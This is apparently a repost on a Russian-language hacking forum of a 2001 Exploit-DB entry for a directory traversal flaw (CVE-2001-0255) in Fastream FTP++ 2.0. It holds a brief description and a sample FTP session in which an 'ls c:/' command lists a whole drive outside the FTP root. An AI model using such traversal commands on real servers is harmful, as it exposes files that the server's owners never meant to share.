Exploit fastream ftp++ 2.0 - Directory Traversal

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20584
Проверка EDB
  1. Пройдено
Автор
SNS RESEARCH
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0255
Дата публикации
2001-01-22
Код:
source: https://www.securityfocus.com/bid/2267/info

It is possible for a remote uesr to gain read permissions outside of the Faststream FTP++ Server directory. By requesting an 'ls' command along with the drive name, Fastream FTP++ will disclose the contents of the requested drive. 

ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.

(listing of c:\)
 
Источник
www.exploit-db.com

Похожие темы